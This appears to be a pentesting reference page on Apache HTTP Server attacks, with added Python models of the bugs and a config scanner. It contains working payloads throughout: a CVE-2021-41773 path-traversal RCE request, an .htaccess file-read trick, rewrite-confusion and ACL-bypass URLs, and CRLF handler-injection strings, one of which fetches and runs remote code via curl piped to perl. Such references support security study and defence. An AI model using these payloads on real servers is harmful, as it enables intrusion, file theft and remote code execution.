Apache

tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Executable PHP extensions

Check which PHP extensions the Apache server executes. To find them you can run:

bash
grep -R -B1 "httpd-php" /etc/apache2

Other places where this configuration can be found are:

bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

CVE-2021-41773 is a path traversal in Apache HTTP Server 2.4.49 caused by a flaw in the (then new) path normalisation, which did not recognise `.%2e` as `..`. The fix in 2.4.50 was incomplete (CVE-2021-42013, bypassed with double encoding such as `.%%32%65`). The traversal only reaches paths that are not covered by a `Require all denied` section, and with mod_cgi/mod_cgid enabled it becomes RCE by executing /bin/sh through the CGI handler:
bash
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
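To make the ordering bug concrete, here is an added example (not Apache's code, and not from the original page) that models the two normalisation orders in simplified form: the flawed order collapses dot-dot segments before percent-decoding, the fixed order decodes first and rejects climbing above the root. The ScriptAlias mapping and DocumentRoot are assumed values.

```python
import posixpath
from urllib.parse import unquote

# Assumed server layout for the model (not taken from the page).
SCRIPT_ALIAS = ("/cgi-bin/", "/usr/lib/cgi-bin/")
DOCUMENT_ROOT = "/var/www/html"


def flawed_normalize(url_path):
    """Simplified 2.4.49 behaviour: '..' segments are collapsed while the path
    is still percent-encoded, so '.%2e' is not recognised as '..'. The decode
    happens afterwards and re-creates the traversal."""
    out = []
    for seg in url_path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(unquote(s) for s in out)


def fixed_normalize(url_path):
    """Decode each segment first, then collapse. Climbing above the root is
    rejected (returns None; Apache answers 400 in that case)."""
    out = []
    for seg in url_path.split("/"):
        seg = unquote(seg)
        if seg == "..":
            if not out:
                return None
            out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def map_to_filesystem(url_path):
    """Translate a normalised URL path to a filesystem path the way the
    assumed ScriptAlias/DocumentRoot would, then let the OS collapse '..'."""
    if url_path is None:
        return None
    src, dst = SCRIPT_ALIAS
    if url_path.startswith(src):
        return posixpath.normpath(dst + url_path[len(src):])
    return posixpath.normpath(DOCUMENT_ROOT + url_path)


def resolve(url_path, normalize):
    """Run one normalisation strategy and map the result to the filesystem."""
    return map_to_filesystem(normalize(url_path))


# The traversal segment from the curl request above.
TRAVERSAL = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"

if __name__ == "__main__":
    print("2.4.49 order:", resolve(TRAVERSAL, flawed_normalize))  # /bin/sh
    print("fixed order :", resolve(TRAVERSAL, fixed_normalize))   # None (rejected)
```

The flawed order leaves `/usr/lib/cgi-bin/../../../../../bin/sh` for the filesystem layer to collapse into `/bin/sh`, which is exactly what mod_cgi then executes; the fixed order never produces a path outside the alias.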

LFI via .htaccess ErrorDocument file provider (ap_expr)

If you can control a directory's .htaccess and AllowOverride includes FileInfo for that path, you can turn 404 responses into arbitrary local file reads by using the ap_expr file() function inside ErrorDocument.

  • Requirements:
  • Apache 2.4 with the expression parser (ap_expr) enabled (default in 2.4).
  • The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo).
  • The Apache worker user must have read permission on the target file.

.htaccess payload:

apache
# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}

Trigger it by requesting any non-existent path below that directory, for example when abusing userdir-style hosting:

bash
curl -s http://target/~user/does-not-exist | sed -n '1,20p'

Notes and tips:

  • Only absolute paths work. The content is returned as the response body of the 404 handler.
  • The effective read permissions are those of the Apache user (typically www-data/apache). You won't read /root/* or /etc/shadow on default setups.
  • Even if .htaccess is owned by root, if the parent directory is owned by the tenant and allows renaming, you may be able to rename the original .htaccess and upload your replacement via SFTP/FTP:
  • rename .htaccess .htaccess.bk
  • put your malicious .htaccess
  • Use this to read application source code under the DocumentRoot or vhost config paths to harvest secrets (DB creds, API keys, etc.).
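On the defensive side, the precondition for this technique is a `<Directory>` whose AllowOverride includes FileInfo (or All), since ErrorDocument belongs to the FileInfo override group. The following added example (not part of the original page) scans an httpd configuration for such directories; the configuration text it parses is constructed for the example, and the parser is intentionally simple (top-level `<Directory>` blocks only, no Include handling).

```python
import re

# Constructed sample configuration for the example (not a real server's config).
SAMPLE_CONFIG = """\
<Directory />
    AllowOverride None
    Require all denied
</Directory>
<Directory /var/www/html>
    AllowOverride Indexes
    Require all granted
</Directory>
<Directory /home/*/public_html>
    AllowOverride FileInfo AuthConfig Limit
    Require all granted
</Directory>
<Directory "/srv/tenants">
    AllowOverride All
    Require all granted
</Directory>
"""

# <Directory path> ... </Directory>, with or without quotes around the path.
DIRECTORY_RE = re.compile(r'<Directory\s+"?([^">]+)"?\s*>(.*?)</Directory>', re.S | re.I)
ALLOWOVERRIDE_RE = re.compile(r"^\s*AllowOverride\s+(.+?)\s*$", re.M | re.I)


def risky_allowoverride_dirs(config_text):
    """Return [(directory, AllowOverride value)] for every <Directory> block in
    which a tenant-controlled .htaccess could set ErrorDocument, i.e. where the
    FileInfo override group is enabled directly or through 'All'."""
    risky = []
    for block in DIRECTORY_RE.finditer(config_text):
        path, body = block.group(1), block.group(2)
        ao = ALLOWOVERRIDE_RE.search(body)
        # Apache 2.4 defaults to 'None' when the directive is absent.
        value = ao.group(1) if ao else "None"
        groups = {word.lower() for word in value.split()}
        if "all" in groups or "fileinfo" in groups:
            risky.append((path, value))
    return risky


if __name__ == "__main__":
    for path, value in risky_allowoverride_dirs(SAMPLE_CONFIG):
        print(f"{path}: AllowOverride {value}  <- .htaccess may set ErrorDocument")
```

Run it against the merged configuration (for example the output of `apachectl -t -D DUMP_CONFIG` on httpd 2.4) rather than a single file, so directories enabled through Include'd snippets are not missed.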

Confusion Attack

These types of attacks were introduced and documented by Orange in this blog post; the following is a summary. The "confusion" attack abuses the fact that the dozens of modules that together make up Apache are not perfectly synchronised, so one module modifying some data in an unexpected way can cause a vulnerability in a later module.

Filename Confusion

Truncation

mod_rewrite will trim the content of r->filename after the character ? (modules/mappers/mod_rewrite.c#L4141). This is not entirely wrong, because most modules treat r->filename as a URL. But in other cases it will be treated as a file path, which can cause a problem.

  • Path Truncation

It is possible to abuse mod_rewrite, as in the following example rule, to access other files in the filesystem, removing the last part of the expected path simply by appending ?:

bash
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`

# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
  • Misleading RewriteFlag assignment

In the following rewrite rule, as long as the URL ends with .php it will be treated and executed as PHP. Therefore it is possible to send a URL that ends with .php after the ? character while the path loads a different file type (e.g. an image) with malicious PHP code inside it:

bash
RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>

# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

ACL Bypass

It is possible to access files that the user should not be able to access, even when the configuration should deny access, with settings such as:

xml
<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>

This is because by default PHP-FPM will receive URLs ending in .php, such as http://server/admin.php%3Fooo.php, and since PHP-FPM strips everything after the ? character, the previous URL will load /admin.php even though the previous rule forbade it.
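The three tricks above (path truncation, the [H=...] handler flag, and the `<Files>` ACL bypass) all come down to which component sees the string before and after the `?`. The following added example (not from the original page or from Apache's sources) models that in simplified form: a RewriteRule matched against the decoded URI whose result is cut at the first `?`, a `<Files>` section compared against the basename of r->filename, and PHP-FPM discarding what follows `?`. The DocumentRoot is an assumed value.

```python
import fnmatch
import posixpath
import re
from urllib.parse import unquote

DOCUMENT_ROOT = "/var/www/html"  # assumed for the model


def _apache_backrefs(substitution):
    """mod_rewrite writes back-references as $1..$9; re.Match.expand() wants \\1..\\9."""
    return re.sub(r"\$(\d)", r"\\\1", substitution)


def rewrite(request_uri, pattern, substitution, handler_flag=None):
    """Model of one RewriteRule: the pattern is matched against the *decoded*
    URI, the expanded substitution becomes r->filename, and everything from the
    first '?' on is cut off (it is treated as a query string). An [H=...] flag
    sets r->handler for whatever file that leaves.
    Returns (filename, handler); (None, None) if the rule does not match."""
    decoded = unquote(request_uri)
    m = re.search(pattern, decoded)
    if not m:
        return None, None
    filename = m.expand(_apache_backrefs(substitution)).split("?", 1)[0]
    return filename, handler_flag


def files_section_matches(filename, files_arg):
    """<Files "admin.php"> compares its (shell-wildcard) argument with the last
    path component of r->filename. Without a rewrite, a request for
    /admin.php%3Fooo.php keeps the decoded '?' in r->filename, so the basename
    is 'admin.php?ooo.php' and the section does not apply."""
    return fnmatch.fnmatchcase(posixpath.basename(filename), files_arg)


def phpfpm_script_path(filename):
    """PHP-FPM is handed a name ending in .php and discards everything after '?'."""
    return filename.split("?", 1)[0]


if __name__ == "__main__":
    # Path truncation: the '?' (sent as %3F) drops '/profile.yml' from the result.
    print(rewrite("/user/orange%2Fsecret.yml%3F", r"^/user/(.+)$", "/var/user/$1/profile.yml"))
    # Handler confusion: the regex sees '...ooo.php', the file served is 1.gif.
    print(rewrite("/upload/1.gif%3fooo.php", r"^(.+\.php)$", "$1", "application/x-httpd-php"))
    # ACL bypass: <Files admin.php> misses, the .php$ handler regex hits, FPM runs admin.php.
    fn = DOCUMENT_ROOT + unquote("/admin.php%3Fooo.php")
    print(files_section_matches(fn, "admin.php"), bool(re.search(r"\.php$", fn)), phpfpm_script_path(fn))
```

Each step looks reasonable on its own; the vulnerability is the disagreement between them about whether the string is a URL (with a query part) or a filesystem path.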

DocumentRoot Confusion

bash
DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

An interesting fact about Apache is that the previous rewrite tries to access the file both under the DocumentRoot and under the filesystem root. So a request to https://server/html/about will check the file /var/www/html/about.html and /about.html in the filesystem. This can be abused to access files anywhere in the filesystem.

Server Source Code Disclosure

  • CGI source code disclosure

It is enough to append %3F to the end to leak the source code of a CGI script:

bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi
  • PHP source code disclosure

If the server hosts several domains, one of which is a static domain, this can be abused to browse the filesystem and leak PHP code:

bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php

Local Gadgets Manipulation

The main problem with the previous attack is that, by default, access to most of the filesystem is denied, as in the Apache HTTP Server's configuration template:

xml
<Directory />
AllowOverride None
Require all denied
</Directory>

However, Debian/Ubuntu allow /usr/share by default:

xml
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>

Therefore, it would be possible to abuse files located inside /usr/share in these distributions.

Local Gadget to Information Disclosure

  • Apache HTTP Server with websocketd may expose the dump-env.php script at /usr/share/doc/websocketd/examples/php/, which can leak sensitive environment variables.
  • Servers with Nginx or Jetty might expose sensitive web application information (e.g., web.xml) through their default web roots placed under /usr/share:
  • /usr/share/nginx/html/
  • /usr/share/jetty9/etc/
  • /usr/share/jetty9/webapps/

Local Gadget to XSS

  • On Ubuntu Desktop with LibreOffice installed, exploiting the help files' language switch feature can lead to Cross-Site Scripting (XSS). Manipulating the URL at /usr/share/libreoffice/help/help.html can redirect to malicious pages or older versions through unsafe RewriteRule.

Local Gadget to LFI

  • If PHP or certain front-end packages like JpGraph or jQuery-jFeed are installed, their files can be exploited to read sensitive files like /etc/passwd:
  • /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
  • /usr/share/javascript/jquery-jfeed/proxy.php
  • /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Local Gadget to SSRF

  • Utilizing MagpieRSS's magpie_debug.php at /usr/share/php/magpierss/scripts/magpie_debug.php, an SSRF vulnerability can be easily created, providing a gateway to further exploits.

Local Gadget to RCE

  • Opportunities for Remote Code Execution (RCE) are vast, with vulnerable installations like an outdated PHPUnit or phpLiteAdmin. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.

Jailbreak from Local Gadgets

It's also possible to jailbreak from the allowed folders by following symlinks generated by installed software in those folders, like:

  • Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
  • Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
  • Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
  • MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
  • SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Moreover, by abusing symlinks it was possible to obtain RCE in Redmine.

Handler Confusion

This attack exploits the overlap in functionality between the AddHandler and AddType directives, which both can be used to enable PHP processing. Originally, these directives affected different fields (r->handler and r->content_type respectively) in the server's internal structure. However, due to legacy code, Apache handles these directives interchangeably under certain conditions, converting r->content_type into r->handler if the former is set and the latter is not.

Moreover, in the Apache HTTP Server (server/config.c#L420), if r->handler is empty before executing ap_run_handler(), the server uses r->content_type as the handler, effectively making AddType and AddHandler identical in effect.

Overwrite Handler to Disclose PHP Source Code

In this talk a vulnerability was presented where an incorrect Content-Length sent by a client can cause Apache to mistakenly return the PHP source code. This was due to an error-handling issue between ModSecurity and the Apache Portable Runtime (APR), where a double response leads to r->content_type being overwritten with text/html.
Because ModSecurity doesn't properly handle return values, it would return the PHP code without interpreting it.

Overwrite Handler to XXXX

TODO: Orange hasn't disclosed this vulnerability yet

Invoke Arbitrary Handlers

If an attacker is able to control the Content-Type header in a server response, he will be able to invoke arbitrary module handlers. However, by the time the attacker controls this, most of the request processing is already done. Still, it is possible to restart the request processing by abusing the Location header: if the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and is processed again.

RFC 3875 (the CGI specification) defines the Local Redirect Response behaviour in Section 6.2.2:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Therefore, to perform this attack one of the following vulnerabilities is needed:

  • CRLF Injection in the CGI response headers
  • SSRF with complete control of the response headers

Arbitrary Handler to Information Disclosure

For example /server-status should only be accessible locally:

xml
<Location /server-status>
SetHandler server-status
Require local
</Location>

It is possible to access it by setting the Content-Type to server-status and a Location header that starts with /.

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

Arbitrary Handler to Full SSRF

Redirect to mod_proxy to access any protocol on any URL:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3F %0d%0a
%0d%0a

However, the X-Forwarded-For header is added, which prevents access to cloud metadata endpoints.

Arbitrary Handler to Access a Local Unix Domain Socket

Access PHP-FPM's local Unix Domain Socket to execute a PHP backdoor located in /tmp/:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Arbitrary Handler to RCE

The official PHP Docker image includes PEAR (Pearcmd.php), a command-line PHP package management tool, which can be abused to obtain RCE:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

See Docker PHP LFI Summary, by Phith0n, for the details of this technique.
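All four payloads in this section share one shape: a CRLF-injectable redirect CGI is made to emit `Location: /...` plus a chosen `Content-Type`, and mod_cgi turns that into an internal redirect whose handler is taken from the Content-Type. The following added example (not from the original page, and not Apache's code) builds such request URLs from a list of headers and models the mod_cgi decision described above. The vulnerable script `redir.cgi` with parameter `r` is assumed to copy its parameter unsanitised into its own Location header, as in the examples.

```python
from urllib.parse import quote

CRLF = "%0d%0a"


def crlf_redirect_url(base_url, param, injected_headers):
    """Build the request for a redirect CGI (assumed vulnerable: it copies the
    parameter straight into its Location header). The leading 'http://' keeps
    the script's own Location line well-formed; each injected CRLF starts a
    new header line and the final double CRLF closes the header block, so
    anything the script appends afterwards lands in the body.
    Header values are percent-encoded so that '+' and spaces survive the
    query-string decoding (this is why the PEAR payload uses %2b)."""
    lines = [f"{name}:{quote(value, safe='/:|?=$(){}')}" for name, value in injected_headers]
    return f"{base_url}?{param}=http://{CRLF}{CRLF.join(lines)}{CRLF}{CRLF}"


def cgi_disposition(status, headers):
    """Model of how mod_cgi treats the script's header block (RFC 3875 6.2.2
    plus the r->content_type -> r->handler fallback described above):
      - no Location                         -> ordinary document response
      - status 200 and Location starts '/' -> internal redirect; the request
        is reprocessed and the script's Content-Type is used as handler name
      - any other Location                  -> client-side redirect"""
    location = headers.get("Location")
    if location is None:
        return ("document", None)
    if status == 200 and location.startswith("/"):
        return ("internal-redirect", headers.get("Content-Type"))
    return ("client-redirect", None)


# The header sets from the examples above.
SERVER_STATUS = [("Location", "/ooo"), ("Content-Type", "server-status")]
PHP_FPM_SOCKET = [
    ("Location", "/ooo"),
    ("Content-Type", "proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php"),
]

if __name__ == "__main__":
    for headers in (SERVER_STATUS, PHP_FPM_SOCKET):
        print(crlf_redirect_url("http://server/cgi-bin/redir.cgi", "r", headers))
        print("  mod_cgi ->", cgi_disposition(200, dict(headers)))
```

Note that the model only decides the disposition; whether the named handler actually runs still depends on the module being loaded (mod_status, mod_proxy, mod_proxy_fcgi) and on the access controls that the reprocessed request walks through.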
